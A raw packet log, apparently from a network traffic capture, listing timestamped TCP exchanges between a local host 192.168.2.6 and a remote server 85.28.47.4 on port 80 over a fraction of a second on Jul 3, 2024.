                                                                Jul 3, 2024 08:38:17.024962902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024972916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024974108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024983883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024990082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024995089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025006056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025007010 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025016069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025027990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025034904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025063038 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025702000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025713921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025724888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025736094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025738001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025746107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025757074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025768042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025772095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025778055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025790930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025800943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025800943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025810957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025819063 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025821924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025831938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025835991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025841951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.025851965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.025881052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.026571989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026582956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026606083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026607037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.026618004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026628971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026638985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.026639938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026650906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026668072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026678085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026689053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026698112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.026700974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026706934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.026707888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026715040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026721001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.026767969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.027431011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027442932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027453899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027463913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027471066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.027473927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027484894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027496099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027507067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027517080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027524948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.027527094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027538061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027546883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.027548075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027559042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027564049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.027570009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.027580023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.027606964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.028270006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028280973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028291941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028301954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028306007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.028312922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028323889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028332949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028335094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.028346062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.028363943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.028378963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.108844042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.108874083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.108884096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.108913898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.108988047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109040022 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109072924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109083891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109095097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109106064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109106064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109127045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109153032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109268904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109278917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109289885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109308958 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109335899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109462976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109472990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109483957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109505892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109530926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109703064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109719038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109729052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109739065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109749079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109749079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109760046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109771013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109780073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109781981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.109798908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.109813929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.110146046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110156059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110167027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110177994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110189915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.110219955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.110400915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110410929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110444069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.110560894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110570908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110588074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110599041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110603094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.110610008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110619068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.110621929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110632896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.110646009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.110672951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111095905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111109972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111119986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111129999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111139059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111140966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111151934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111155987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111162901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111172915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111182928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111183882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111192942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111203909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111215115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111215115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111224890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111232996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111236095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111248970 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111274004 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111943007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111953020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111963034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111974001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.111980915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.111984015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112001896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112010956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112011909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.112020969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112031937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112040997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112044096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.112051964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112061977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112072945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112073898 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.112082958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112093925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112104893 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.112124920 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.112947941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112958908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112967968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112977982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112988949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.112998962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113007069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113009930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113020897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113028049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113030910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113043070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113046885 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113053083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113063097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113064051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113075018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113085985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113094091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113095999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113123894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113898993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113914013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113924026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113934040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113940001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113944054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113954067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113965034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113971949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.113975048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113985062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.113995075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114005089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114008904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114015102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114026070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114026070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114036083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114042997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114047050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114058971 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114085913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114850044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114861012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114870071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114880085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114890099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114897966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114907026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114917040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114922047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114928007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114938021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114948034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114949942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114958048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114968061 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114968061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114978075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.114985943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.114989042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.115000010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.115005016 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.115020990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.115046978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.115565062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.115576982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.115606070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.115621090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.195986032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196029902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196042061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196046114 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196068048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196083069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196196079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196207047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196217060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196228981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196239948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196279049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196428061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196496964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196507931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196518898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196530104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196530104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196541071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196552038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196553946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196578979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196592093 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196897984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196908951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196918964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196928978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196939945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196943045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196949959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196963072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.196973085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.196993113 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197391987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197402954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197412014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197422981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197428942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197432995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197443962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197460890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197489023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197820902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197830915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197840929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197850943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197860956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197869062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197870970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197880983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197891951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197901964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197901964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197911978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197921991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197921991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197932005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197938919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197942019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197952986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197953939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.197963953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.197983980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198009968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198580980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198591948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198615074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198632002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198736906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198748112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198757887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198767900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198776960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198781967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198792934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198801994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198812008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198812008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198822021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198832035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198832035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198842049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198852062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198862076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.198862076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.198892117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.199685097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199697018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.199707985 CEST804971085.28.47.4192.168.2.6
